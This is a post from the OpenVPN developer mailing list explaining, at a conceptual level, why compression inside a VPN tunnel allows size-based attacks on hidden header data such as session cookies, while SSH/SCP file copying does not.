Hi, On Fri, Apr 02, 2021 at 08:35:36PM +0200, Simon Matter wrote: > What I'm still wondering is why is compression so dangerous with OpenVPN > but not so with things like SSH or SCP?
The problem is adversary-controlled traffic in a VPN tunnel, like
"you surf on a web site, and there is java script that makes your
browser send carefully crafted requests while someone looks at your
VPN tunnel from the outside".
If compression is active, an attacker can see if "the parts of the
header that he can not see" are similar to "the parts that the java
script creates", due to compression making the resulting packets
smaller if sequences are identical.
Supposedly you can use this to steal stuff like session cookies,
which java script would normally not be able to see.
Now, I personally find this all a bit unrealistic in practice - it's
quite a number of "ifs", and even then, it's unclear if possible in
practice, or even interesting enough, given the myriard of easier to
exploit attack vectors.
But it *is* a possible attack, and if weighting "is this a good feature?"
against maintenance effort and possible security effects, compression
starts drifting towards the negative side (because most traffic inside
VPNs is already compressed or encrypted anyway today, so compression won't
have a big effect).
Now, in ssh, you copy files of your own choice. Compression is useful
there, if the files are not already compressed. An attacker won't be
able to manipulate just *part* of one file, to see if the neighbouring
100 bytes are "similar"... so this class of attacks does not exist.
(Crypto people, correct me if I misstated something...)
gert
--
"If was one thing all people took for granted, was conviction that if you
feed honest figures into a computer, honest figures come out. Never doubted
it myself till I met a computer with a sense of humor."
Robert A. Heinlein, The Moon is a Harsh Mistress
Gert Doering - Munich, Germany g...@greenie.muc.de
signature.asc
Description: PGP signature
_______________________________________________ Openvpn-devel mailing list Openvpn-devel@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/openvpn-devel
